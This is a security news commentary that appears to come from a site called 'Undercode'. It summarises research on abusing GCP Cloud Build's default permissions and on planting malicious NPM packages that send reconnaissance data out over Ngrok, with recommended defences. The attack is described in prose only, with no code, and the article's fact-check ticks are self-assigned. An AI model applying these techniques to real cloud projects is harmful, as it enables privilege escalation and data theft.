Hidden Backdoors in the Cloud: New Exploits Target Google, AWS, and Azure Services

Cloud security has taken center stage once again as researchers from Tenable and Cisco Talos uncover serious vulnerabilities in how Google Cloud Platform (GCP) handles service permissions. These findings show just how easily cybercriminals could exploit default configurations in GCP’s Cloud Functions and Cloud Build — extending even to AWS and Azure. The implications are widespread and serious, signaling a call to action for cloud users and administrators across the board.

How Attackers Are Exploiting the Cloud: What the Research Reveals

Researchers have recently revealed how attackers could abuse Google Cloud services using seemingly benign components like Cloud Functions and Cloud Build. These are tools meant to simplify serverless app deployment, but when misconfigured, they become prime targets for malicious activity.

Tenable’s research zeroed in on a loophole involving the default Cloud Build service account. Whenever a Cloud Function is created or modified, it triggers Cloud Build, which historically received overly generous permissions by default. Attackers leveraging this flaw could escalate their privileges, granting themselves admin-like access across a project’s cloud environment.

Cisco Talos built on this by showing how attackers could insert malicious code into the build pipeline using NPM packages and tools like Ngrok. Their test setup showed how an attacker could deploy a package with a manipulated package.json file. When included in a Cloud Run deployment, it allowed unauthorized access to network configurations, Docker container presence, and even kernel-level information — all sent back to the attacker’s own server.

Even though Google has patched this specific privilege escalation issue, the underlying techniques still work in different forms. The same model of attack was shown to be adaptable to AWS Lambda and Azure Functions, primarily by smuggling malicious NPM code into Node.js runtimes.

Attackers could still perform environment reconnaissance by running scripts that check for Docker configurations, network paths, CPU settings, and mounted volumes. This kind of intel helps them plan and execute more sophisticated attacks, including lateral movement across cloud systems.

Google responded by limiting the default permissions of Cloud Build service accounts and offering new policy controls. Still, experts emphasize that the risk hasn’t vanished. They recommend enforcing strict permission boundaries, regularly updating systems, and closely monitoring network behavior for suspicious activity, especially involving tunneling services like Ngrok.

The main takeaway? While the specific exploit may be patched, the threat landscape remains dynamic. Companies must maintain vigilant, proactive security strategies to combat the ever-evolving tactics of cloud attackers.

What Undercode Say:

This case serves as a textbook example of how default permissions and misconfigurations can quietly open doors for attackers, especially in complex cloud environments. The discovery by Tenable and Cisco Talos uncovers a deeper truth: cloud security isn’t just about patching known bugs — it’s about addressing architectural weaknesses that attackers are increasingly exploiting.

Cloud Build and Cloud Functions are core elements of GCP’s serverless ecosystem. They offer automation, speed, and convenience. But when a default service account is allowed to operate with excessive permissions, attackers can repurpose that automation pipeline to their advantage. Privilege escalation isn’t just a buzzword — it’s a gateway to total cloud compromise.

The analytical brilliance of Cisco Talos lies in their proof-of-concept using Debian Linux with NPM and Ngrok. By embedding rogue code in the build process, they show how easily malicious payloads can travel through legitimate channels, escaping early detection. This points to a growing trend: attackers no longer need to brute-force access — they simply piggyback on misused services and neglected configurations.

What’s more alarming is how these tactics are cloud-agnostic. Whether it’s GCP, AWS, or Azure, the core vulnerability comes from how permissions are managed and how build pipelines are monitored — or not. The use of NPM packages in these attacks is also critical. Supply chain attacks are becoming more common, and if developers aren’t verifying their packages, they’re essentially handing the keys over to intruders.

The defensive strategy here must evolve beyond simple monitoring. Organizations should adopt least-privilege access across all service accounts, enforce multi-layered approval processes for function deployment, and flag anomalies like new Cloud Functions appearing unexpectedly or unusual outbound traffic to tunneling services.

Additionally, tools that track system calls and behavioral analytics should be integrated into CI/CD pipelines. By understanding what normal deployment looks like, companies can more easily flag when something deviates.

Lastly, education plays a major role. Cloud engineers and developers must be trained to recognize the risks of misconfigured services and the importance of scrutinizing open-source dependencies. Attackers are counting on ignorance. Knowledge and vigilance are the strongest countermeasures.

Fact Checker Results ✅

✔ Google has patched the excessive permission issue in Cloud Build.
✔ Cisco Talos successfully demonstrated environment enumeration using NPM packages and Ngrok.
✔ Vulnerability tactics remain adaptable to AWS and Azure platforms. 🔍

Prediction 🔮

The next wave of cloud exploits will likely focus on the supply chain, specifically targeting third-party packages and build automation. With tools like NPM being increasingly weaponized, cloud providers and organizations must prepare for more subtle, persistent threats embedded deep within the software lifecycle. Expect attackers to pivot toward CI/CD pipelines, aiming to exploit trust in open-source ecosystems while masking malicious activity through legitimate-looking deployments.